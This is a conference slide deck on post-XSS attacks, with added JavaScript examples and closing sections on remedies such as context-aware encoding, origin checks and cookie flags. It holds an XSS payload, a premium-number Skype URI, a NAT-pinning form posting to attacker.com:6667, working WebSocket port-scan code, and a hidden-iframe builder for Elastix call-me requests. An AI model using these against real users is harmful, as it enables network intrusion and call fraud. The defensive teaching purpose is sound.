
Post XSS Exploitation : Advanced Attacks and Remedies


Description

This is the presentation I used at the National Conference on "Current Scenario & Emerging Trends in Information Technology" held at MSIT in March 2013. Here is the link to the whitepaper: http://www.exploit-db.com/wp-content/themes/exploit/docs/24559.pdf


Page 1: Post XSS Exploitation : Advanced Attacks and Remedies

Post XSS Exploitation Advanced Attacks and Remedies

By Ms. Kritika Sobti

Mr. Adwiteeya Agrawal

Page 2

Introduction to XSS

• Definition:

Cross-Site Scripting (XSS) is a web application vulnerability in which attacker-controlled input is placed into a page without validation and without output encoding for the context it lands in. The victim's browser cannot tell the injected script from the site's own, so it executes it with the privileges of the vulnerable site's origin.

• Types of XSS:
1. Reflected
2. Stored
3. DOM based

Page 3

Reflected XSS

Input: XSS
Output: Search Result

Input: <script>alert("XSS")</script>
Output: Script Executed

The search term is echoed back into the response page unencoded. The payload is not stored anywhere; it reaches the victim only through a crafted link they are persuaded to open.

Page 4

Stored XSS

Certain parameters (comments, profile fields, forum posts) are stored persistently by the application.

A script entered as one of those parameters is served to, and executed by, every user who views the page that displays it, with no crafted link required.

Page 5

DOM based XSS

DOM-based XSS is an XSS attack in which the script executes because client-side code in the victim's browser writes attacker-controlled data (for example from location.hash or document.URL) into the DOM "environment". The payload need not appear in the server's response at all, so server-side filtering does not see it.

Page 6

What is Post-XSS Exploitation?

• Combining an XSS vulnerability with other web application vulnerabilities, or with browser and device features, to carry out attacks far more damaging than the classic cookie theft or alert box.

• Some of the attacks:
1. Android file stealing
2. URI scheme for Skype on iOS
3. HTML5 "vulnerabilities"
4. IRC NAT pinning and geolocation
5. Our new module

Page 7

Android File Stealing

An Android 2.2 user visits a link that initiates a download of a file xyz.html.

The user is not notified and the file is saved under the download directory on the SD card (sdcard/downloads).

The page then opens the downloaded file from the local file system. JavaScript running in that file:// context can read the downloaded file and other files on the device whose paths are known (the same local context), and send their contents to the attacker.

Page 8

Skype's improper URI scheme on iOS

iOS applications embed WebKit views and register custom URI schemes. Skype registered skype:// without asking for confirmation, so a page that loads the following URI (for example as an iframe source) makes the victim's phone place a call: skype://1900expensivepremiumnumber?call

A second issue: the Skype application for iOS uses a locally stored HTML file to display chat messages from other Skype users, but it fails to HTML-encode the sender's "Full Name". An attacker who sets their name to JavaScript gets that code executed, in the local file context, when the victim views the message.

Page 9

HTML5 Vulnerabilities (1)

• Using an API the way it was not meant to be used

HTML5 has two APIs for making cross-domain connections: Cross-Origin Resource Sharing (XMLHttpRequest with CORS) and WebSockets. With them, JavaScript can attempt a connection to any IP address and any port (apart from the ports the browser blocks), which makes them an ideal candidate for port scanning. The connection itself usually fails, but how long it takes to fail, and in what state, tells the script whether the port is open, closed or filtered. This is a misuse of browser features rather than a flaw in HTML5 itself, and it runs from inside the victim's network, behind their firewall.
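The timing heuristic behind that port scan, as an added example that is not part of the original slides. It follows the WebSocket variant of the technique; the thresholds (openMax, closedMax, the 30 s timeout) are assumptions that vary by browser and operating system, and the host and ports in the usage line are placeholders.

```javascript
// Added example, not from the slides: the timing heuristic behind browser-side
// port scanning with WebSockets (the same idea applies to CORS XMLHttpRequest).
// The thresholds below are assumptions and vary by browser and OS; calibrate
// them against a known open and a known closed port before trusting results.

const STATE = { CONNECTING: 0, OPEN: 1, CLOSING: 2, CLOSED: 3 };

// Decide a port's state from (a) how long the socket took to leave CONNECTING
// and (b) the state it ended in.
//  - open:     the TCP handshake completes at once; the browser reaches OPEN
//              (a real WebSocket server) or, for any other service, fails the
//              HTTP upgrade and goes to CLOSED within a few hundred ms.
//  - closed:   the host answers with RST; browsers report the error, but some
//              delay it (about a second in the browsers of the time).
//  - filtered: the SYN is dropped, so the socket is still CONNECTING when our
//              own timeout fires.
function classifyPort(elapsedMs, finalState, { openMax = 300, closedMax = 5000 } = {}) {
  if (finalState === STATE.CONNECTING) return 'filtered';
  if (elapsedMs <= openMax) return 'open';
  if (elapsedMs <= closedMax) return 'closed';
  return 'filtered';
}

// Probe one port. Resolves with { port, elapsedMs, state }; never rejects.
// Ports on the browser's blocked list (e.g. 6667 in current browsers) make the
// constructor throw a SecurityError synchronously; report those as 'blocked'.
function scanPort(host, port, { timeoutMs = 30000, ...thresholds } = {}) {
  return new Promise((resolve) => {
    const start = Date.now();
    let ws;
    try {
      ws = new WebSocket(`ws://${host}:${port}`);
    } catch (_) {
      resolve({ port, elapsedMs: 0, state: 'blocked' });
      return;
    }
    let done = false;
    const finish = () => {
      if (done) return;
      done = true;
      const elapsedMs = Date.now() - start;
      resolve({ port, elapsedMs, state: classifyPort(elapsedMs, ws.readyState, thresholds) });
      try { ws.close(); } catch (_) { /* already closed */ }
    };
    ws.onopen = finish;   // genuine WebSocket endpoint
    ws.onerror = finish;  // upgrade refused or connection refused
    ws.onclose = finish;
    setTimeout(finish, timeoutMs);  // still CONNECTING: treated as filtered
  });
}

// Scan ports one at a time so each timing measurement is undisturbed.
async function scanPorts(host, ports, options) {
  const results = [];
  for (const port of ports) results.push(await scanPort(host, port, options));
  return results;
}

// Usage from an injected script (placeholder host; needs a browser WebSocket):
// scanPorts('192.168.1.1', [22, 80, 443, 8080]).then((r) => console.log(r));
```

Only the classification is deterministic; the measured times depend on the victim's browser, so a real scan should first probe a port known to be open and one known to be closed on the target and set the thresholds from those readings.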

Page 10

HTML5 Vulnerabilities (2)

• Using an API the way it was not meant to be used

The File API in HTML5 allows JavaScript to read a file once the user has chosen it in an input type=file control (i.e. before it is uploaded). In an XSS attack it can be used to steal files: the control can be styled (made transparent, or disguised as a button or link) so that the user does not realise the click they make is selecting a file for upload. The script still needs that click; the File API does not read arbitrary files on its own.

The directory-upload variant (input type=file with the directory attribute; webkitdirectory in WebKit-based browsers) is a splendid feature from the attacker's point of view: one selection hands over the contents of a whole directory, giving the attacker every file in it.

Page 11

NAT Pinning

• The victim opens an XSS-vulnerable URL whose injected script contains a hidden form posting to http://attacker.com:6667 (the IRC port), and the script submits the form without the victim knowing. The browser opens an HTTP connection to the attacker's fake "IRC server", which simply listens. The form body contains an IRC DCC CHAT request. The victim's router, inspecting port 6667 with its IRC application-layer gateway, sees an "IRC connection" (even though the client is really speaking HTTP) and an attempt at a DCC chat. DCC chats require the client to open a local port for the remote chatter to connect back to, so the router, which otherwise blocks all inbound connections, forwards any traffic arriving on the port named in the DCC request back to the victim's machine. The attacker can now reach that port on the victim's host from the Internet. Chrome and Firefox subsequently added port 6667 to their blocked-port lists to stop exactly this.

Page 12

XSSMAP - Geolocation

While collecting imagery for Google Street View, Google also recorded the wireless networks in the vicinity, the MAC addresses (BSSIDs) of their access points, and the GPS coordinates at which each was seen. A script injected through XSS, here running against the web interface of the target's router, reads the router's MAC address and submits it to Google's location service (the same lookup Google Maps uses for Wi-Fi positioning), which returns the GPS coordinates the router was mapped to.

Page 13

Our New Module - The concept

• Elastix 2.2.0 is a VoIP PBX whose web interface enables registered SIP clients to make calls just by visiting a URL.

After visiting: https://IP_address_of_Elastix/recordings/misc/callme_page.php?action=c&callmenum=Extension@from-internal/h

the PBX originates a call for the extension named in callmenum, using whatever Elastix session the browser holds.

Executed via: an iframe's source. The XSS payload injects a hidden iframe pointing at that URL, so the victim's browser requests it with their Elastix session attached and the call is placed without their knowledge.
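The call-me request above, built and embedded the way the slide describes, followed by a server-side check that would refuse it. This is an added example, not the authors' XSSF module and not Elastix code: pbx.example and attacker.example are placeholder hosts, 201 stands in for the slide's Extension placeholder, and isCrossSiteRequest is a hypothetical check of the kind the call-me page would need.

```javascript
// Added example, not the authors' XSSF module: the call-me request the slide
// describes, built and embedded the way an XSS payload would do it, followed
// by a server-side origin check (hypothetical, not Elastix code) that would
// reject it. pbx.example and attacker.example are placeholder hosts.

// The Elastix 2.2.0 call-me URL from the slide. PHP decodes the query string,
// so percent-encoding '@' and '/' in callmenum is harmless and keeps an
// attacker-chosen value from injecting extra parameters.
function buildCallmeUrl(pbxHost, callmenum) {
  return 'https://' + pbxHost + '/recordings/misc/callme_page.php' +
         '?action=c&callmenum=' + encodeURIComponent(callmenum);
}

// Minimal attribute encoding so the URL cannot break out of src="...".
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The injected markup: an invisible iframe. The victim's browser loads the URL
// with their Elastix session cookie attached, so the PBX originates the call.
function callmeIframeHtml(pbxHost, callmenum) {
  return '<iframe src="' + encodeAttr(buildCallmeUrl(pbxHost, callmenum)) +
         '" width="0" height="0" style="display:none"></iframe>';
}

// Server side: a state-changing request like callme_page.php should only be
// honoured when the browser itself says it came from this site or from the
// user's own navigation (address bar, bookmark). `headers` is a plain object
// keyed by lower-case header name. Returns true when the request must be refused.
function isCrossSiteRequest(headers, pbxHost) {
  const site = headers['sec-fetch-site'];               // modern browsers
  if (site) return site !== 'same-origin' && site !== 'none';
  const ref = headers['origin'] || headers['referer'];  // older browsers
  if (!ref) return true;                                // no evidence: refuse
  try {
    return new URL(ref).host.toLowerCase() !== pbxHost.toLowerCase();
  } catch (_) {
    return true;                                        // unparsable: refuse
  }
}
```

An origin check is a stop-gap; the durable fix for a URL that changes state on a GET is a per-session CSRF token (or an explicit confirmation page), which an injected iframe cannot supply.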

Page 14

Integration with XSSF

Page 15

Why XSSF?

• XSSF (the Cross-Site Scripting Framework) ships with a rich set of native modules
• It integrates with Metasploit, so browsers hooked through an XSS vulnerability can be targeted with exploits from msf
• Development is simple: a module's code and all of its settings live in a single file

Page 16

Protection against XSS

• Various filters can be used to sanitize inputs and prevent XSS vulnerabilities. Such filters inspect user input for JavaScript or HTML markup and stop it from reaching the page. Filters that merely look for "<script" are easily bypassed (event handlers, encoded payloads, other tags), so the reliable defence is to encode every piece of user data for the context it is inserted into: HTML body, HTML attribute, JavaScript string, or URL.

• A large number of security libraries are also available for encoding user input, such as:
OWASP Encoding Project (hosted on Google Code)
HTML Purifier or htmLawed: for PHP
Anti-XSS Library: for .NET applications
AntiSamy API: for Java (a .NET port also exists)
XSS-HTML-Filter: for Java

Filter / Description

FILTER_SANITIZE_ENCODED: URL-encodes the string, optionally stripping or encoding special characters. Suitable for values placed into a URL, not for HTML output.

htmlentities(): converts characters that have an HTML entity equivalent (use ENT_QUOTES so single quotes are covered as well). This is the encoding for the HTML body and quoted-attribute contexts.

FILTER_SANITIZE_MAGIC_QUOTES: applies addslashes(), which only puts a backslash before quotes and backslashes. It leaves < and > untouched, so it does not prevent XSS; it is deprecated as of PHP 7.3.
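What each transform in the table actually does to the reflected-XSS payload from page 3, as an added example that is not part of the original slides. It is written in JavaScript so it runs stand-alone; each function names the PHP call it mirrors in its comment.

```javascript
// Added example, not from the slides: what each filter in the table actually
// does to a payload, and why only context-aware output encoding stops XSS.
// The PHP equivalents are named in the comments.

// HTML body and quoted-attribute context. Same character set as PHP's
// htmlspecialchars($s, ENT_QUOTES); htmlentities() additionally encodes
// non-ASCII characters, which adds nothing against XSS.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context (a value inside <script>var q = '...';</script>).
// Everything outside [A-Za-z0-9] becomes \xHH or \uHHHH, so the value can
// neither close the quote nor contain "</script>".
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    const hex = code.toString(16);
    return code < 0x100 ? '\\x' + hex.padStart(2, '0') : '\\u' + hex.padStart(4, '0');
  });
}

// URL query-parameter context; what FILTER_SANITIZE_ENCODED / urlencode() are for.
function encodeForUrlParam(s) {
  return encodeURIComponent(String(s));
}

// PHP's addslashes(), i.e. FILTER_SANITIZE_MAGIC_QUOTES: a backslash before
// single quote, double quote, backslash and NUL. Nothing else changes.
function addslashes(s) {
  return String(s).replace(/[\\'"\0]/g, (c) => (c === '\0' ? '\\0' : '\\' + c));
}

// Does the string still carry an HTML tag the browser would parse?
function containsHtmlTag(s) {
  return /<\s*\/?[a-z]/i.test(s);
}

// The reflected-XSS search page from the slides, rendered safely.
function renderSearchResult(query) {
  return '<p>Results for: ' + encodeForHtml(query) + '</p>';
}

// The same page with the query also placed in an inline script variable;
// HTML encoding alone would be the wrong choice here.
function renderSearchScript(query) {
  return "<script>var q = '" + encodeForJsString(query) + "';</script>";
}
```

The two render functions show the point the table hides: the same search term needs a different encoding depending on where the template puts it, and addslashes() is not one of those encodings at all.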

Page 17

Protection against Post-XSS

• Every post-XSS attack needs an injected script to run first, so protection starts with preventing the execution of scripts entered as input variables, exactly as on the previous page.

• Cookie security can be improved by limiting the Domain and Path attributes for which cookies are sent, setting them HttpOnly so scripts cannot read them, setting the Secure flag and serving the site over SSL/TLS, and never storing confidential data in cookies. Note that HttpOnly stops cookie theft but not attacks in which the script simply drives the victim's browser, such as the call-me iframe above; state-changing requests also need CSRF tokens or an explicit confirmation step.

• Another method is to disable client-side scripts altogether.

• Various browser add-ons are also available to prevent XSS exploitation. Some of the popular ones are NoScript for Firefox and NotScripts for Chrome and Opera.

Page 18

Thanks